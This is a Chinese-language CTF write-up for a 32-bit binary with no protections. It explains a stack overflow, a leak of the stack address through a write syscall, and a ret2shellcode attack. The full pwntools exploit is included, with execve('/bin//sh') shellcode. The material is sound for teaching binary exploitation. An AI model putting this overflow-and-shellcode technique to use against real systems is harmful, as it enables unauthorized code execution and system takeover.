查看保护：

---

32位程序保护全没开，黑盒测试下效果：

---

存在栈溢出，那么这题的想法就是直接ret2shellcode了。IDA中看看具体流程：

---

出奇的少，这题不能看反汇编的代码，直接去看汇编：

---

主要就2个功能，通过系统调用来执行读写功能，将字符串Let's start the CTF:输出，然后接收用户输入。我们看到注释下标注了长度为0x14。也就是我们能刚好覆盖到返回地址，但是我的shellcode有0x18个字节。根本不够执行完全部，而且目前没有有用的信息来让我ret2stack。因此我们要去调试看看能不能利用什么信息：

---

我们观察在代码的最开始，会将一个esp压入栈中，紧接着栈的布局将变成如此:

---

5个a是我输入的测试数据。ecx将和esp将指向用户输入数据的起始位置。此时esp要索引到返回地址，将直接执行add esp,14h。执行完后esp将指向旧的esp：

---

而且我们惊奇的发现，这两个值相差0x4，因此我们需要通过write函数将他泄露出来，紧着这我们的返回地址就有了，步骤shellocode就是要返回到布局的栈地址处执行。原理我讲明白了，直接上exp：

from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
 
io = process('./start')
#io = remote('node5.buuoj.cn',28971)
gdb.attach(io)
io.recv()
mov_ecx_esp = 0x8048087
payload1 = b'a'*0x14 + p32(mov_ecx_esp)
io.send(payload1)

leak_stack_addr = u32(io.recv(4))
cur_esp = leak_stack_addr+0x14
print(hex(leak_stack_addr))
payload2 = b'a'*0x14 + p32(cur_esp)
shellcode ='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xb
int 0x80                
'''

shellcode=asm(shellcode)

print(len(shellcode))
payload2 += shellcode
io.send(payload2)
pause()
#gdb.attach(io)
io.interactive()